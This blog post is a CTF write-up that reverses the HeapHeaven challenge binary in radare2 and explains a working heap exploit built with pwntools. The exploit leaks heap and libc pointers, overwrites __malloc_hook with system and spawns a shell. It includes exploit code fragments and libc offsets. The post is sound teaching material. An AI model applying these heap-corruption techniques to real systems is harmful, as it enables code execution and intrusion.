Intro
In the quest to do heap exploits, learning
radare2 and the like, I got myself hooked into a CTF that caught my attention because of it having many exploitation challenges. This was the
Hack.lu CTF:
|
Hack.lu challenges by FluxFingers |
You can see from that list the
Pwn category that there are a few ones so I tried not to overkill myself with difficulty and go for the easiest Heap one, HeapHeaven. As much as I wanted to try the HouseOfScepticism because of the resemblance with the
Malloc Malleficarum techniques, when opening it on radare2, it looked quite a bit daunting: no symbols, tons of functions here and there and my inexperience on reading assembly.
Another goal for this post is to make some kind of introduction to the usage of radare2. It's quite a good tool with tons of utilities inside such as ROP, search for strings, visual graphs, etc.
The analysis
heaps and pieces
For this challenge we are given (again) the libc.so.6 along the binary. If this is a good giveaway that we will have to do some jump to libc's functions to gain code execution. The binary itself is just an:
HeapHeaven: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked,
interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0,
BuildID[sha1]=617e9a6742b6537d6868f2f8355d64bea4316a99, not stripped
Cool! It's not stripped. This means that we have all the debugging symbols. First thing I did was throwing it into radare2 and check the functions from the menu we are presented with:
|
HeapHeaven menu |
We can see that the functions should be something like "whaa!", "mommy?", etc.
Firing up the radar
We fire up radare2 against the HeapHeaven file like so:
$: radare2 HeapHeaven -AA
This will open the file and do an extensive
analysis of it. For a quicker but less extensive analysis, we can just put one "A".
Once the analysis is complete, we can head to the
var code analysis menu by writing the command
vv
and pressing enter. If you haven't ever used radare2, you are wondering if all the commands are going to be like "
aa
" "
vv
" "
cc
". Well...
|
radare2 trolling |
After typing in
vv
we are presented with the whole lot of functions resolved by radare2 due to the file not being stripped. Yay!
|
Non-stripped symbols on radare2 |
By inspecting the first function from the menu, namely "whaa!", we see a function parsing a number and then a call to malloc. Our intuition is telling us that this function will serve to allocate chunks of whichever size we specify and that, the other functions, will be doing all other heap manipulation.
To prove this inside radare2, we browse with the arrow keys to the function we want and then press
g
to seek to that function position. Then press
V
(shift + "V") to go to the visual graph representation.
|
whaa! function representation |
Watch out for the differences here vs x86 (32 bit). As we can see, the arguments aren't pushed to the stack like we are used to see on x86. On x86_64 we can see that the most common way is to pass the arguments in the registers, especially the RDI register. Something that doesn't change is how functions return their values, this is, into the RAX/EAX register.
I am going to spoil the
get_num
function a bit and say that, it is actually not parsing a number. Let's see it in radare2. Again, seek to the function and press capital V:
|
DIsassembly of get_num |
It is clearly seen that the function is trying to read, through the
scanf function, the format
%255s
and it will get stored on the argument pointed by the RAX register. In radare2, it's shown as
local_110h
which is then passed to
parse_num
.
|
Zoom out of parse_num function. |
Here, thanks to the blue arrows that radare2 describes, we can observe that most likely there is some kind of loop logic happening. Since it is parsing a "number" and previously a string was
scanf
'ed, it would not be a bad assumption to think that it's parsing our string.
|
Prologue of parse_num function. |
Indeed, the string is passed into
RDI
and then it's stored in a local variable
local_18h
. This is afterwards compared against certain bytes and the counter (
local_ch
) of the loop is incremented by 2. The operation done inside the loop is actually, "binary adding" through bitshifting with the
shl
opcode. Finally, the resulting operation is stored in another variable to be returned into
RAX
(
local_8h
).
|
Function parse_num comparing bytes. |
I spent some time "deciphering" what this code was doing and reading about opcodes. If we watch closely, both are doing almost the same. The only difference is that the second is increasing by one the counter (
rax + 1
), and then accessing the byte to that offset of the array (
mov rax, qword [local_18h]; add rax, rdx; movzx eax, byte [rax]
) to compare it against he byte 0x69 (letter "i").
Something that would help us at this point is, renaming the variables to something more user friendly. In radare2, we can do this by seeking to the offset of the function we want to with:
[0x00000b8d]> s sym.parse_num
[0x000009ca]> afvn local_ch counter_int
[0x000009ca]> afvn local_18h arg_string
[0x000009ca]> afvn local_8h result
|
Second part of parse_num function with renamed variables. |
This is now quite clearer, isn't it? Basically, it is being compared against the bytes
0x77
,
0x69
and
0x61
. If it's
0x77
(letter "w"), it will jump to the next char and check if it's
0x69
or
0x61
(letter "a"). If the next char is "i", it will add one to the result. Else, if the char is "a", it will just increase the counter and keep parsing.
See the translation? We are feeding binary numbers as toddlers (regarding FluxFingers) speak, "wi" being
1
and "wa" being
0
.
The exploit
Having the following functions:
whaa!
: Allocates chunks of a specified size.
mommy?
: Reads a string from a specified offset.
<spill>
: Writes to an specified offset.
NOM-NOM
: Free's a pointer at an specified offset.
Here's what we need to do.
- Leak
top
and heap pointers
- Calculate the offset to
__malloc_hook
- Calculate the offset to
system
- Write the address of
system
into __malloc_hook
- Call system with "/bin/sh" as an argument
babbling comprehensively
To code the solution I relied heavily on
pwntools by Zach Riggle. The library is just
great. I started writing a function that will translate an hex number to a comprehensive babbling ("wiwawiwa" like).
...
def translate_baby(size):
wiwa = ""
for bit in ("%s" % "{0:b}".format(size)):
if bit == "1":
wiwa += "wi"
else:
wiwa += "wa"
return ("%s" % (wiwa+"0"*(254-len(wiwa))))
...
I am padding the string with zeroes to the right. This is because the
scanf
tries to read
%255s
and, the loop, won't stop until the counter reaches
0x3f
. This would cause trouble because if we don't pad enough chars to the right, the parse_num function will keep reading values from memory and, in case there is another "wiwa" around there, it will mess up our calculations #truestory.
leaking addresses
From the
Painless intro to ptmalloc2, we remember that a normal chunk had the following structure:
+---------------------------------+-+-+-+
| CHUNK SIZE |A|M|P|
+---------------------------------+-+-+-+
| FORWARD POINTER(FD) |
| BACK POINTER(BK) |
| |
| |
| - - - - - - - - - - - - - |
| PREV_SIZE OR USER DATA |
+---------------------------------------+
The FD pointer is set to, either the top chunk pointer if it's the only chunk free of that size or, to the next free chunk of the same size if there are more chunks free'd afterwards. Since we can read from a certain offset, we are able to trigger allocations and free's to set top and FD pointers to then, read those:
...
# Alocate four chunks so we can avoid coalescing chunks and leak:
# * Pointer to chunk2
# * Pointer to main_arena+88 (av->top)
allocate_chunk(0x128, io)
allocate_chunk(0x128, io)
allocate_chunk(0x128, io)
allocate_chunk(0x128, io)
# Now free chunks 2 and 4 in that order so we can access their FD
# The first free'd chunk's FD will point to main_arena->top
# The second free'd chunk's FD will point to the second chunk
free_chunk(0x20, io)
free_chunk(0x280, io)
# Read the FD pointers and store them to calculate offsets to libc
main_arena_leak = read_from(0x20, io)
print("[+] Main_arena: %#x" % main_arena_leak)
heap_2nd_chunk = read_from(0x280, io)
print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...
I am not going to cover why or where those pointers are set since I think I have covered this matter extensively on previous heap posts (don't be lazy, read them!). However, it's mandatory to explain why we need to free the offset to 0x20 and the offset to 0x280.
When the program starts, it triggers a malloc(0x0) which, in turn, reserves 32 bytes (0x20 in hex) in memory. As you may remember, fastchunks only set their FD pointer (fastbins are single linked lists), hence jumping over the first fastchunk and going straight to free the next chunk of size 0x130 in memory (we allocated 0x130-0x8 in order to trigger an effective allocation of 0x130 in memory). This will set its FD and BK pointers to the top chunk in main_arena.
|
Function parse_num comparing bytes. |
Now we free the fourth chunk in order to populate it's FD pointer and make it point to the first free'd chunk. See how the FD pointer is pointing to the previous free'd chunk 0x55cd4bd8020.
|
Status of the fourth chunk after the second free |
We are ready to leak the addresses now. The only thing we need to do is call the menu function "mommy?" and feed it the previous offsets:
...
# Read the FD pointers and store them to calculate offsets to libc
main_arena_leak = read_from(0x20, io)
print("[+] Main_arena: %#x" % main_arena_leak)
heap_2nd_chunk = read_from(0x280, io)
print("[+] 2nd chunk: %#x" % heap_2nd_chunk)
...
Return to libc (ret2libc)
After leaking both addresses, one to the heap and another one inside
main_arena
we have effectively bypassed ASLR. The
main_arena
is always placed at a fixed relative position from the other functions of the libc library. After all, the heap is implemented inside libc.
To obtain the offsets to other functions we can just query inside gdb and then move the offsets depending on the libc we are targeting.
|
Calculating offsets within gdb |
Let's start assigning all of this inside our exploit code:
...
# Offset calculation
happa_at = heap_2nd_chunk - 0x10
malloc_hook_at = main_arena_leak - 0x68
malloc_hook_offset = malloc_hook_at - happa_at
libc_system = malloc_hook_at - 0x37f780
...
The variable happa_at is the address of the base of the heap. This is, the first allocated chunk of them all.
malloc_hook_at
represents the absolute address of the weak pointer
__malloc_hook
. We are using this hook to calculate offsets instead of the
top
chunk (there is no special reason for this). Finally, the
system
symbol is calculated and stored into the
libc_system
variable.
We need happa_at because when using the "<spill>" function, we have to provide as the first argument an offset (not an address!). This offset starts from the base of the heap (namely,
happa_at
). Then, we provide the string we want to write at that offset.
Our goal is to write at
__malloc_hook
the address of
system
. There are several techniques like creating fake
FILE
structures, overwriting
malloc
hooking functions or going after the
dtors
. All of this in order to redirect code execution. I chose this one since it's the one I feel is simpler enough and it is so convenient as the function we place in
__malloc_hook
must take the form of
malloc
. This means that the function we place in there must take an argument just as malloc, so
system
fits so well.
wiwapwn
Having in mind that
__malloc_hook
only gets triggered when an allocation happens and, that the argument to
malloc
is passed onto
__malloc_hook
therefore passed onto system. This means that the last
malloc
we trigger, needs to have a pointer to the string "/bin/sh\x00". We can satisfy this by writing the string to any of the chunks already allocated and then, feed the pointer to that chunk's position. I've chosen the first allocated chunk at offset
0x0
, this is, the pointer pointed by
happa_at
:
...
# write /bin/sh to the first chunk (pointed by happa_at)
write_to(0x0, io, "/bin/sh\x00")
...
Since we have calculated the offsets to all that we need let's overwrite the pointer of
__malloc_hook
with the pointer to system:
...
# Write the address of system at __malloc_hook
write_to(malloc_hook_offset, io, p64(libc_system))
...
All we need to do now is trigger
__malloc_hook
with the address of "/bin/sh\x00" as an argument and interact with the shell:
...
# Call malloc and feed it the argument of /bin/sh which is at happa_at
# This will trigger __malloc_hook((char*)"/bin/sh") and give us shell :)
allocate_chunk(happa_at, io)
...
|
Exploit for HeapHeaven |
Final notes
Note that I didn't need to change any offsets to system's libc to exploit the remote system. This was because the system I used to build the exploit had the same libc. In case we don't have the same libc and we are provided with such what we need to do is, calculate the base of libc through leaked pointers and then, add offsets like such:
|
Exploit for HeapHeaven |
Then, in our code we would have:
libc_system = calculated_libc_base + 0x45390
As a final note. This blog was actually published in my actual company's internal blog that I decided to also make it public through my blog since I don't think write-ups are
SensePost's-blog-worthy.
I hope you enjoyed this write-up as much as I enjoyed solving this challenge! You can get the full
HeapHeaven exploit code here.